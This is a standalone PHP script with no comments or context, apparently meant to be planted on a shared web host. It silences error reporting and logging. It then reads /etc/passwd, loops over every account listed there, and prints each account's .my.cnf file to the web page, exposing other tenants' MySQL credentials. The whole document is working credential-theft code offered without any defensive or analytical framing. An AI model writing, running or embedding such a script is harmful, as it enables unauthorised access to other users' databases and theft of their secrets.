<?php

    error_reporting(0);
    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('display_errors', 0);
    $pwd = @getcwd();
    if (!function_exists('posix_getegid')) {
        $usr = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(posix_geteuid());
        $gid = @posix_getgrgid(posix_getegid());
        $usr = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    if (empty($usr)) {
        if (preg_match_all("#/home/(.*)/public_html/#", $pwd, $mxx)) {
            preg_match_all("#/home/(.*)/public_html/#", $pwd, $mxx);
            $usr = $mxx[1][0];
        }
    }
    preg_match_all("#/home(.*){$usr}/#", $pwd, $m2);
    $home = $m2[1][0];
    if (file_get_contents("/etc/passwd")) {
        $passwd = file_get_contents('/etc/passwd');
        $passwd = explode("\n", $passwd);
        foreach ($passwd as $pwd) {
            $pawd = explode(":", $pwd);
            $user = $pawd[0];
            if (file("/home{$home}{$user}/.my.cnf")) {
                echo "\n<br><br>" . file_get_contents("/home{$home}{$user}/.my.cnf");
            }
        }
    } elseif (file("/home{$home}{$usr}/.my.cnf")) {
        echo "\n<br><br>" . file_get_contents("/home{$home}{$usr}/.my.cnf");
    }
